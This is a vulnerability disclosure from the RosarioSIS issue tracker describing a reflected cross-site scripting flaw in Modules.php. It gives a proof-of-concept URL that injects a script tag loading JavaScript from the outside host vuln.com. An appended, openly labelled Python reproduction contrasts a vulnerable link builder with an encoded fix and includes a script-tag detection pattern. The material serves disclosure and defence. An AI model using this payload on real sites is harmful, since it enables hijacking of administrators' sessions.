François Jacquet / rosariosis / Issues / #282 (Closed)
Issue created Jun 08, 2020 by M507

Reflected Cross-Site Scripting vulnerability

Cross-Site Scripting vulnerability in RosarioSIS Student Information System allows remote attackers to execute arbitrary web script. The exploitation of this issue can lead to admin session hijacking or executing arbitrary requests using the admin's session.

Plugin README
Vulnerability type: Cross-Site Scripting vulnerability (XSS)
Vendor of the product(s): RosarioSIS
Affected product(s)/code base: Tested on version 6.5.1
Has vendor confirmed or acknowledged the vulnerability: Yes
Attack type: Reflected XSS
Impact & Description: C:L/I:L/A:N
Affected component: Modules.php
Attack vector(s): Remote
Proof of concept (PoC): Details below
Reference(s): https://github.com/francoisjacquet/rosariosis/issues/260
CVSS v3.1 details: AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Notes:

# PoC
http://RosarioSIS.edu/Modules.php?modname=School_Setup/Rollover.php&%22%3E%3CSCRIPT/SRC=%27http://vuln.com/xss.js%27;%3C/script%3E=1
# vuln.com gets this request for xss.js
GET /xss.js HTTP/1.1
Host: RosarioSIS.edu
User-Agent: Mozilla/5.0 (Win)
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://RosarioSIS.edu/Modules.php?modname=School_Setup/Rollover.php&%22%3E%3CSCRIPT/SRC=%27http://vuln.com/xss.js%27;%3C/script%3E=1
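As an added illustration (not code from the report or from RosarioSIS), the Python below reproduces the pattern the PoC relies on: the payload sits in a query-string parameter name, is percent-decoded the way PHP fills `$_GET`, and is then re-emitted unescaped into a double-quoted attribute. The link-builder sink, `POC_URL` as a constant, the `check()` helper and the `<script src=...>` detector regex are assumptions of this example, standing in for whatever Modules.php actually does; the hardened variant shows the fix a practitioner would apply at the sink, encoding once per context the data crosses (URL-encode the pairs, then HTML-escape the attribute).

```python
"""Reflected XSS via a query-string *parameter name*: a toy reproduction of the
pattern behind the RosarioSIS report. Added example, not RosarioSIS code; the
link builder below is a hypothetical sink, not the real one in Modules.php."""
import re
from html import escape
from urllib.parse import unquote_plus, urlencode, urlsplit

# The PoC URL from the report (constructed input for this example).
POC_URL = ("http://RosarioSIS.edu/Modules.php?modname=School_Setup/Rollover.php"
           "&%22%3E%3CSCRIPT/SRC=%27http://vuln.com/xss.js%27;%3C/script%3E=1")


def parse_query(url):
    """Decode the query string the way PHP fills $_GET: split on '&', then on
    the first '=', and percent-decode both sides. The attacker's payload lands
    in the parameter *name*, which value-only sanitisation overlooks."""
    params = []
    for pair in urlsplit(url).query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params.append((unquote_plus(key), unquote_plus(value)))
    return params


def build_link_vulnerable(script, params):
    """Hypothetical sink: rebuilds the current URL from the decoded GET
    parameters and drops it into a double-quoted attribute with no encoding.
    The leading '"' of the payload closes the attribute, '>' closes the tag."""
    query = "&".join(f"{k}={v}" for k, v in params)
    return f'<a href="{script}?{query}">Next</a>'


def build_link_hardened(script, params):
    """Same link, encoded for each context it passes through: percent-encode
    key/value pairs (URL context, like PHP's http_build_query), then
    HTML-escape the finished value (like htmlspecialchars with ENT_QUOTES)."""
    href = escape(f"{script}?{urlencode(params)}", quote=True)
    return f'<a href="{href}">Next</a>'


# Finds a <script ...> start tag and pulls out its src, whatever the quoting.
# A '/' straight after the tag name is a legal attribute separator in HTML,
# which is why the PoC writes <SCRIPT/SRC=...> instead of <SCRIPT SRC=...>.
_SCRIPT_SRC = re.compile(
    r"<script(?=[\s/>])[^>]*?src\s*=\s*(['\"]?)([^'\"\s>]+)\1", re.I)


def injected_script_src(html):
    """Return the src of the first <script> start tag in the markup, or None."""
    m = _SCRIPT_SRC.search(html)
    return m.group(2) if m else None


def check(url):
    """Render the URL through both sinks and report what each would load."""
    params = parse_query(url)
    vuln = build_link_vulnerable("Modules.php", params)
    safe = build_link_hardened("Modules.php", params)
    return {
        "params": params,
        "vulnerable_html": vuln,
        "hardened_html": safe,
        "vulnerable_loads": injected_script_src(vuln),  # the external xss.js
        "hardened_loads": injected_script_src(safe),    # None
    }


if __name__ == "__main__":
    for name, result in check(POC_URL).items():
        print(f"{name}: {result}")
```

Two details worth noting when triaging a report like this one: the `=` inside `SRC=%27...` is consumed as the key/value separator, so the attack only reassembles into `<SCRIPT/SRC='...'>` if the sink re-emits `name=value` pairs (or the raw decoded query string) rather than a single parameter, and the payload's leading `"` and `>` only make sense if that reflection sits inside a double-quoted attribute. Both are consistent with the `GET /xss.js` the reporter observed, and both are closed off by encoding at the sink rather than by filtering parameter values.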